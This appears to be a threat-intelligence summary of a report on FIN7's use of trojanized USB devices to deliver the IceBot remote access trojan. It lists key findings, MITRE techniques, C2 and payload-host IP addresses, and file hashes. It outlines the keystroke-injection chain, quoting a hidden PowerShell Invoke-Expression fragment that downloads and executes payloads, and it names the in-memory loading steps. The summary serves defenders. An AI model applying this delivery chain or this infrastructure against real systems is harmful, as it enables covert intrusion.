Gemini Advisory analyzes FIN7’s use of trojanized USB devices (BadUSB) to deliver the IceBot Remote Access Trojan, enabling unauthorized remote access to victims’ networks. The report details the Arduino-based sketch used to infect USB devices, a network of payload hosts and C2 servers, and an exposed control panel showing infected systems. #FIN7 #IceBot #BadUSB #Lizar #Tirion #Diceloader #BastionSecure
Keypoints
- FIN7 used an Arduino sketch file called “sketch_jul31a.ino” to install malware on USB devices as part of BadUSB attacks.
- Trojanized USB devices load the IceBot Remote Access Trojan (RAT), resulting in FIN7 gaining unauthorized remote access to systems within victims’ networks.
- We identified 9 IP addresses that host FIN7’s malicious payloads and 3 FIN7 command-and-control (C2) servers, one of which contains a control panel for managing infected systems.
- The attack relies on keystroke injection via USB keyboards, abusing Windows’ default trust in USB input devices (BadUSB/Rubber Ducky).
- The delivery chain uses a Run dialog to launch cmd.exe, then PowerShell to download and execute payloads from IPs (e.g., 206.54.190.230).
- The IceBot RAT exposes a control panel with infected system details and C2 IPs (e.g., 199.80.55.66, 207.246.92.213, 185.250.151.126).
MITRE Techniques
- [T1059.001] PowerShell – The PowerShell-based commands download and execute payloads; “powershell.exe -w h -command Invoke-Expression” is used to run inline scripts.
- [T1059.003] Command Shell – The sketch opens the Run dialog and launches “cmd.exe” to execute a command prompt.
- [T1027] Obfuscated/Compressed Files and Information – The PowerShell script decompresses data via DeflateStream to obtain a .NET assembly.
- [T1620] Reflective Loading – The .NET assembly is decoded, loaded, and executed in memory via Reflection.Assembly::Load.
- [T1071.001] Web Protocols – The RAT communicates with C2 infrastructure; the control panel lists infected hosts and C2 IPs (e.g., “The IP address of the C2 server is 185.250.151[.]126:443”).
Indicators of Compromise
- [IP Address] IPs hosting payloads/C2 – 138.124.180.127, 185.232.170.24, and 7 more IPs (per the article’s table of hosts and C2 servers)
- [SHA-256] File hashes – sketch_jul31a.ino: f778dccfe13b8597a0a9cbb61a204c03f8e166d7f7d5a21dfcf03d56bd2505c3, wis.ps1: 136095f5f529a891eabd8e04693c182f0701716fe051fa04825b5d2e0c85d1ae, .NET assembly: 6a3912016f3b41c8cb67a2bc3a6fb2597065d065a809f33288fe838693b7f9a0, Shellcode: 0a23ad00d0c62dccae0a759ad4853cd514abd176cfa85ba2665e30f7bdc8bcc0, RAT: 09189108547ebf046c47f01f4645667e6816a126355ee963d5ad7b91167e4290
- [File] Filenames involved – sketch_jul31a.ino, wis.ps1, wis.txt, .NET assembly, Shellcode, RAT
Read more: https://geminiadvisory.io/fin7-flash-drives-spread-remote-access-trojan/